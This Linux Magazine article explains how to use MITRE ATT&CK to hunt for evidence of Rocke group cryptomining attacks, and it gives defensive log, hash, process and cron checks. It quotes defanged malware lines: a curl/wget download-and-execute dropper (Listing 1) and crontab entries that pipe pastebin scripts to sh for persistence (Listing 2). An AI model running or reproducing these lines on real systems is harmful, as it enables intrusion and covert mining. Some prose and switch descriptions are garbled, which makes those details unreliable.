Working with the MITRE ATT&CK knowledge base
Detective Work
The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We'll show you how to use that information to look for evidence of an attack.
Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But the attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing tactics and attackers. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.
About Logs
Linux systems store data in logfiles. You can specify four main categories of logs: applications, events, services, and systems. Most logs are stored as text. Entries typically include important information such as: time, type, and severity levels of the event, as well as the name of the process and the Process ID (PID). Of course, there are also exceptions, such as wtmp
or lastlog
which have a binary format. Generally, files with logos are available in the /var/log
directory, but not always. It happens that some programs save their diary files in other places.
In the event that systemd
operates on your Linux system, many users reach for the journalctl
command, which displays the messages of the systemd
recorder.
When diagnosing problems or errors, the first thing you need to do is to check the logs. Searching for something in logs can be boring and time consuming. That is why many users prefer to use simple twists in the Bash shell. Text processing commands like grep
and awk
are popular tools for searching out log information. These tools are especially useful for quick, one-liner queries. The use of scripts will save time and make it easier to extract valuable data from logs.
An example of a simple uniform script is:
grep -E -r -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" > our-data.txt
The grep
command uses a regular expression (the -e
switch allows you to search with regex) to search data in the catalogs recursively (switch -R
) and then displays the matched data parts in a separate line. The sort
command sorts data, and the uniq
command deletes duplicates. Then the result of this operation is saved to the our-data.txt
file.
Searching for Evidence
It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:
- T1036.005 – Masquerading: Match Legitimate Name or Location
- T1053.003 – Scheduled Task/Job: Cron
- T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking
The following sections takes a closer look at these techniques and what to do about them, but before delving into the details, remember that it is always a good idea to look for suspicious files.
Malware often creates files in the following directories:
/usr/local
/usr/sbin
/tmp
It is worth looking at these locations and checking if there are suspicious files in them. You might find file names similar to the correct ones, and sometimes a file might be generated automatically and take a series of numbers. It is good to check the hash of these files. If the hash is different from what it is supposed to be, that is an indication that the file has been replaced or tampered with. You can use the VirusTotal platform [6] to check whether the hash is what it is supposed to be. The following command will find every executable file and check its control sum (SHA256), and the results will be saved to the list.txt
file:
find -type f -exec sha256sum '{}' \; > list.txt
T1036.005: Masquerading
Suppose the group downloads a payload using the curl
or wet
command. The configuration file and the malware binary file are saved in the /tmp
directory called kthrotlds
. The launch malware is using the nohup
command, rejecting the output data and enabling the background binary file to be made. Performing this process is a form of masking. The system will constantly perform a process called kthrotlds
, but the processes will not use binary files in the /tmp
folder.
Listing 1 shows part of the malicious code.
Listing 1
Malicious Code
01 if [ ${ARCH}x = "x86_64x" ]; then 02 (curl -fsSL hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -o \ 03 /tmp/kthrotlds||wget -q hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -O \ 04 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 05 elif [ ${ARCH}x = "i686x" ]; then 06 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ 07 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ 08 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 09 else 10 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ 11 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ 12 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 13 fi 14 nohup /tmp/kthrotlds >/dev/null 2>&1 &
By default, Linux does not log information on open ports and connections. However, netstat
comes to the rescue:
netstat -tupln
This command will return information on connections (port and IP address) to and from the system. You can trace the connections that are set and then track down the most undesirable ones.
Another way to check for a masked process is with the ps
command:
ps auxf
This command will display a list of processes running in the system. A malicious process often appears in square brackets, meaning that there are no arguments at the command line and it is possibly running as a thread.
T1053.003 – Cron
Hackers use a variety of techniques to achieve persistent access to the system after restarting. One of these methods is to add tasks to the cron tool. Cron allows you to plan your tasks and gives you the ability to follow commands according to the schedule without logging into the system. Listing 2 shows a few crontab
entries that could execute malicious code.
Listing 2
Crontab Entries
01 "*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh 02 ##" 03 04 "*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh 05 ##"
In this case, the attacker does two things:
- Adds a new
crontab
entry that points to a malicious script. - Places the malicious script in a folder, which will allow it to execute at a specific time defined in the
crontab
entry.
That is why it is always worth checking cron tasks to look for suspicious entries:
crontab -l
Malware can manipulate the cron utility in various ways, therefore it is also worth looking at the following locations:
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/root
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
Or perform a search to find other cron-related files and directories on your system.
Buy this article as PDF
(incl. VAT)
Buy Linux Magazine
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
Gnome 47.2 Now Available
Gnome 47.2 is now available for general use but don't expect much in the way of newness, as this is all about improvements and bug fixes.
-
Latest Cinnamon Desktop Releases with a Bold New Look
Just in time for the holidays, the developer of the Cinnamon desktop has shipped a new release to help spice up your eggnog with new features and a new look.
-
Armbian 24.11 Released with Expanded Hardware Support
If you've been waiting for Armbian to support OrangePi 5 Max and Radxa ROCK 5B+, the wait is over.
-
SUSE Renames Several Products for Better Name Recognition
SUSE has been a very powerful player in the European market, but it knows it must branch out to gain serious traction. Will a name change do the trick?
-
ESET Discovers New Linux Malware
WolfsBane is an all-in-one malware that has hit the Linux operating system and includes a dropper, a launcher, and a backdoor.
-
New Linux Kernel Patch Allows Forcing a CPU Mitigation
Even when CPU mitigations can consume precious CPU cycles, it might not be a bad idea to allow users to enable them, even if your machine isn't vulnerable.
-
Red Hat Enterprise Linux 9.5 Released
Notify your friends, loved ones, and colleagues that the latest version of RHEL is available with plenty of enhancements.
-
Linux Sees Massive Performance Increase from a Single Line of Code
With one line of code, Intel was able to increase the performance of the Linux kernel by 4,000 percent.
-
Fedora KDE Approved as an Official Spin
If you prefer the Plasma desktop environment and the Fedora distribution, you're in luck because there's now an official spin that is listed on the same level as the Fedora Workstation edition.
-
New Steam Client Ups the Ante for Linux
The latest release from Steam has some pretty cool tricks up its sleeve.